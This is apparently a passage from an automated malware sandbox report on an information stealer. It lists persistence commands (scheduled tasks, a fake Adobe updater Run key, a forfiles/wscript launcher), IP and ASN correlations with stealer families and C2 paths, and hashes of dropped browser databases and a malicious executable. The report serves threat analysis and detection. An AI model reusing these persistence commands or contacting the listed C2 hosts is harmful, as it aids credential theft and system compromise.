                      09:32:33Task SchedulerRun new task: IHUTQLpcIUgXrSpRg path: C:\Windows\Temp\hgYBTjCujtKtfFyH\yIawucxfYjlYyZM\uNvaqUo.exe s>VA /diOIdidPB 525403 /S
                      09:32:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_bdca866007fb255201297d2a15a49513 C:\Users\user\AppData\Local\AdobeUpdaterV168_bdca866007fb255201297d2a15a49513\AdobeUpdaterV168.exe
                      09:32:48Task SchedulerRun new task: BhWnmFHmMHrjz2 path: C:\Windows\system32\forfiles.exe s>/p C:\Windows\system32 /m wscript.exe /c "cmd /C @FNAME ^"C:\ProgramData\XTOpwnsfjaDYySVB\ltGtlmU.wsf^""
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      34.117.186.192SecuriteInfo.com.Win32.Evo-gen.24318.16217.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/json
                      SecuriteInfo.com.Win32.Evo-gen.28489.31883.exeGet hashmaliciousUnknownBrowse
                      • ipinfo.io/json
                      Raptor.HardwareService.Setup 1.msiGet hashmaliciousUnknownBrowse
                      • ipinfo.io/ip
                      Conferma_Pdf_Editor.exeGet hashmaliciousPlanet StealerBrowse
                      • ipinfo.io/
                      Conferma_Pdf_Editor.exeGet hashmaliciousPlanet StealerBrowse
                      • ipinfo.io/
                      w.shGet hashmaliciousXmrigBrowse
                      • /ip
                      Raptor.HardwareService.Setup_2.3.6.0.msiGet hashmaliciousUnknownBrowse
                      • ipinfo.io/ip
                      Raptor.HardwareService.Setup_2.3.6.0.msiGet hashmaliciousUnknownBrowse
                      • ipinfo.io/ip
                      uUsgzQ3DoW.exeGet hashmaliciousRedLineBrowse
                      • ipinfo.io/ip
                      8BZBgbeCcz.exeGet hashmaliciousRedLineBrowse
                      • ipinfo.io/ip
                      85.192.56.26SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                      • 85.192.56.26/api/flash.php
                      BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                      • 85.192.56.26/api/flash.php
                      file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                      • 85.192.56.26/api/flash.php
                      SecuriteInfo.com.Trojan.Siggen28.25504.27914.23637.exeGet hashmaliciousGlupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                      • 85.192.56.26/api/flash.php
                      SecuriteInfo.com.Win64.Evo-gen.28136.30716.exeGet hashmaliciousGCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                      • 85.192.56.26/api/flash.php
                      5NlNJIHhTf.exeGet hashmaliciousUnknownBrowse
                      • 85.192.56.26/api/flash.php
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      NADYMSS-ASRUSecuriteInfo.com.Win64.DropperX-gen.29167.15583.exeGet hashmaliciousPureLog StealerBrowse
                      • 185.172.128.82
                      SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                      • 185.172.128.170
                      lgX7lgUL1w.exeGet hashmaliciousNeoreklami, PureLog Stealer, SmokeLoaderBrowse
                      • 185.172.128.82
                      BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                      • 185.172.128.170
                      file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                      • 185.172.128.136
                      SecuriteInfo.com.Win64.PWSX-gen.29347.28297.exeGet hashmaliciousNeoreklami, PureLog StealerBrowse
                      • 185.172.128.82
                      SecuriteInfo.com.Trojan.DownLoader46.63448.20864.604.exeGet hashmaliciousGCleaner, NymaimBrowse
                      • 185.172.128.69
                      btCbrSS2Je.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                      • 185.172.128.170
                      7urUz64I0Y.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                      • 185.172.128.170
                      file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                      • 185.172.128.136
                      PTSERVIDORPTSecuriteInfo.com.Win64.DropperX-gen.29167.15583.exeGet hashmaliciousPureLog StealerBrowse
                      • 37.221.125.202
                      SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                      • 37.221.125.202
                      lgX7lgUL1w.exeGet hashmaliciousNeoreklami, PureLog Stealer, SmokeLoaderBrowse
                      • 37.221.125.202
                      BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                      • 37.221.125.202
                      SecuriteInfo.com.Win64.PWSX-gen.29347.28297.exeGet hashmaliciousNeoreklami, PureLog StealerBrowse
                      • 37.221.125.202
                      1.exeGet hashmaliciousPureLog StealerBrowse
                      • 37.221.125.202
                      SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exeGet hashmaliciousCryptOne, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, VidarBrowse
                      • 37.221.125.202
                      file.exeGet hashmaliciousAmadey, Neoreklami, PureLog Stealer, zgRATBrowse
                      • 37.221.125.202
                      40UAEu1Kpt.exeGet hashmaliciousLummaC, CryptOne, GCleaner, Glupteba, Mars Stealer, PrivateLoader, PureLog StealerBrowse
                      • 37.221.125.202
                      file.exeGet hashmaliciousPureLog Stealer, Vidar, zgRATBrowse
                      • 37.221.125.202
                      GOOGLE-AS-APGoogleAsiaPacificPteLtdSGhttps://uuyy112200.wixsite.com/my-site-2Get hashmaliciousUnknownBrowse
                      • 34.117.60.144
                      http://servty467.wixsite.com/csuadmin24Get hashmaliciousUnknownBrowse
                      • 34.117.60.144
                      fffmpeg.exeGet hashmaliciousUnknownBrowse
                      • 34.117.188.166
                      SecuriteInfo.com.Variant.Lazy.520200.27930.1926.dllGet hashmaliciousUnknownBrowse
                      • 34.117.186.192
                      SecuriteInfo.com.Variant.Lazy.520200.14494.23583.dllGet hashmaliciousUnknownBrowse
                      • 34.117.186.192
                      SecuriteInfo.com.Variant.Lazy.520200.27930.1926.dllGet hashmaliciousUnknownBrowse
                      • 34.117.186.192
                      SecuriteInfo.com.Variant.Lazy.520200.14494.23583.dllGet hashmaliciousUnknownBrowse
                      • 34.117.186.192
                      Llkht92Tu3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • 34.117.186.192
                      SecuriteInfo.com.Variant.Lazy.448806.8704.4188.dllGet hashmaliciousUnknownBrowse
                      • 34.117.186.192
                      SecuriteInfo.com.Variant.Lazy.448806.29655.2426.dllGet hashmaliciousUnknownBrowse
                      • 34.117.186.192
                      DINET-ASRUSecuriteInfo.com.Win64.DropperX-gen.29167.15583.exeGet hashmaliciousPureLog StealerBrowse
                      • 85.192.56.26
                      SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                      • 85.192.56.26
                      lgX7lgUL1w.exeGet hashmaliciousNeoreklami, PureLog Stealer, SmokeLoaderBrowse
                      • 85.192.56.26
                      BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                      • 85.192.56.26
                      SecuriteInfo.com.Win64.PWSX-gen.29347.28297.exeGet hashmaliciousNeoreklami, PureLog StealerBrowse
                      • 85.192.56.26
                      6uBxa0vGQt.elfGet hashmaliciousGafgytBrowse
                      • 45.151.37.82
                      1.exeGet hashmaliciousPureLog StealerBrowse
                      • 85.192.56.26
                      eyKGju2MU8.elfGet hashmaliciousMiraiBrowse
                      • 95.163.129.201
                      6tJtH22I7a.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, StealcBrowse
                      • 45.131.41.39
                      SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exeGet hashmaliciousCryptOne, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, VidarBrowse
                      • 85.192.56.26
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\ProgramData\freebl3.dlljE4zclRJU2.exeGet hashmaliciousVidarBrowse
                        file.exeGet hashmaliciousVidarBrowse
                          file.exeGet hashmaliciousVidarBrowse
                            SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                              SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                  file.exeGet hashmaliciousVidarBrowse
                                    btCbrSS2Je.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                      7urUz64I0Y.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                        file.exeGet hashmaliciousVidarBrowse
                                          Process:C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exe
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85", baseline, precision 8, 600x800, components 3
                                          Category:dropped
                                          Size (bytes):1789609
                                          Entropy (8bit):7.469477439461062
                                          Encrypted:false
                                          SSDEEP:49152:r8Bu6jeTAcNmspkiTYh2zmlr7hT91hoavGtHJBpCbqag/8PTUb:wBDC7VpNYhu2PhTXh78aq8b+
                                          MD5:6FEB0D1252D06D306EE397ABE3561270
                                          SHA1:465D534EEA6223CFAE671266DF760F2E590EC62B
                                          SHA-256:42C8A15537D7656A0779E75654D016975C70C9E81071B4E9D300AA808359C2E9
                                          SHA-512:CA2F4BA811FD235063AE448907476E2162CDF7734B4BF8CB48B4949D538CE1F6568B4E15211AC2E116BD5B40836CA21B156F80640427D2317A444FF6533A5B23
                                          Malicious:false
                                          Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85....C..............................................!........."$".$.......C....................................................................... .X.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(...(...(...(...(...(...........:.2.C$0)..%..!....2.\........l.&;........2G.Z..r85...+....l.' +D.P9..b..R..2.....r^(...+.=....U.uy=...E.+. ....,.2#_..9..d.{..(.b.....;SHA.Q.....E..t..Z?...E-...R..P.QK.Q@.E-%..R.%.(c2K"F..1....+.o.x}$1E.Ey7x.......1..15..../.j..4......`..n.Y...J..zu.....R?.....m..L.
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.704346314649071
                                          Encrypted:false
                                          SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                          MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                          SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                          SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                          SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                          Malicious:false
                                          Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.6921626779758165
                                          Encrypted:false
                                          SSDEEP:24:Ke7tAQxgl1jHMfrVZzUiHJpDZBZWUs0/0Mocs22ucxEhm:KOvxg7EpNTXZ0gs2+Wg
                                          MD5:AB632FDEF472FE74FBB4E24FB5BA55CA
                                          SHA1:28B6022CB24CC70D380876166272B312391413E4
                                          SHA-256:4F1DE1A8A1A980599333DBEAEBA74C1B183842E42DEC0C3CE0EF57C471D0640D
                                          SHA-512:B906BF2EC107A6A7ED2D0E5D0C8AD844F14B08CCEB7D9EC6EBD69A6BE37052A4FE295BF148A170F32780F902ED9468B12C115E488BB80C779067C91F9CAAF735
                                          Malicious:false
                                          Preview:BWDRWEEARIVCAXDZYFZKKDZROVEXHIWVCMTFOCQTVXZEXPMOUARELJDXJXCSHTPHYDFAQSKPCJXAVNOOSWGLMRRJSEIGOIXHRGVNUUPUMWIYZGMJEYRRCAEYIYIDAZFYDJJMSWJJVLHBGNHHQIAICZQWEBEGEFKVSBUZIDESVOAVZKKPVMUNNYYOCDVZVNLFVJIYNRQXCAYRLGKIDRJAHLNPQBHYCZTYTLUIERFSWFSAYSSBLMPPSQZAAYPORMHIGXFSVODXBYKSZDWLFIRXNFDVQZSZAWNVKBAOCVRUXWIGFEUANFJJZSUQWRBLHJRBTXYOWCBVEFELCWSYYNHPPIXZOEZBTJVVIJEEHIHGWHUPAAZVTZPXEFMEGBQIWJWERRCGRHDYFFLPODCMVBYCRJHEAPKMQTFBKHRVJIWMBUYWFJSKFKBIVGOEKQTPROWJLDILUCYKNSTOPVZEDOYJHFLFDPWAUBFZORWQNODGYAWRTUSFEFIGEXIWYKDNDXZDAITREIZQNGYJLFGAGEYCOTPSHBIHWNMFVBCPAMWVYKIETNGJXRDUTNEVIVXRZAFTNVOADQYFYDMVXJJENNFAZREEJMMAYLCEIOWNXYQQFQBZUDPOAUDJBTIBXIGLQAUADYGSNLFRPBKBPUUZAVBCBZQUROXOPVYHESORLOJFJWEPRXXGVEVNCAEAGPJZDVRSZRNGHPIXJOXXAOZXSKDCSULRFDCPIFAQWNFHMISELJLXJJEZJQFDAXWIIRQOXDDHVECMAOEMQPELDGEIMTWWPRGTZDPGWXXOMDIRFDLZTRSEWXFNUJGTQKFTJYBFZUIMRVUOYAYPMBHCLRBXRSFZXSFZBBCYPRSAKSKZYEIJUZVUGSEAREJOCEEMMPDKFUGGTJSKSZQXAPJJKVYYKBUNLSSHRUSLHBDFTWNYOCCWYVNQHNEHCHGINQIOTMAKGKPQWFFVYXKIIOJONVWAUPKQZAJUMMQGLLGAWEMDCPCF
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):51200
                                          Entropy (8bit):0.8746135976761988
                                          Encrypted:false
                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):5242880
                                          Entropy (8bit):0.03859996294213402
                                          Encrypted:false
                                          SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                          MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                          SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                          SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                          SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.692990330209164
                                          Encrypted:false
                                          SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                          MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                          SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                          SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                          SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                          Malicious:false
                                          Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.136413900497188
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                          MD5:429F49156428FD53EB06FC82088FD324
                                          SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                          SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                          SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                          Category:dropped
                                          Size (bytes):196608
                                          Entropy (8bit):1.265064492694324
                                          Encrypted:false
                                          SSDEEP:384:8/2qOB1nxCkMSSAELyKOMq+8yC8F/YfU5m+OlTLVumD:Bq+n0JS9ELyKOMq+8y9/OwY
                                          MD5:05E37EB785E6287DA9CC44264005CF0D
                                          SHA1:9C12F0B5314BBA38DE918DE0ED4887717FA91943
                                          SHA-256:7DBD12E29648ABE8606A76D0D9650F461BB430AB193A5148295BD3AF2E8F83C9
                                          SHA-512:6A3B64C0E11C3D1AE114F8A6FA980E34166CE4B819A65BC36ECA86D5DC9DE186ABF1DF77AED9C703BE009064F5ABC46921B93E4CF3505BF09A68EC90D3759068
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.6732424250451717
                                          Encrypted:false
                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):2817403
                                          Entropy (8bit):6.609843339002919
                                          Encrypted:false
                                          SSDEEP:49152:kJB6eypEAq+ZRXDHw2mUDlcjGA6PHTzOCdw5V:JnbPXDQ2melci7PHqL
                                          MD5:578530F1C73BA58C2D868B45C7223945
                                          SHA1:3E23CE8B870A4C1061103289B461AA7390AAE9D6
                                          SHA-256:204FE3CF3707B6739E4A5FD8DEA0E69787A1353A4BFEF9BD29BF5FF084931B3A
                                          SHA-512:2F56F6C27F5144FE1F465B509740274B31E37B7F63B959E841390C9647CA8CEE8E5F08E4CC6A54D7898B1F69C496AED7E9979489EFA043F4680ACDDDD1C16416
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.^............................T.............@..........................0+......................................................p...\..............................................................................H............................text............................... ..`.rdata..X........0..................@..@.data...8T.......0..................@....rsrc....`...p...`...@..............@..@_set_1...`......{]..................a.U.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):98304
                                          Entropy (8bit):0.08235737944063153
                                          Encrypted:false
                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.8439810553697228
                                          Encrypted:false
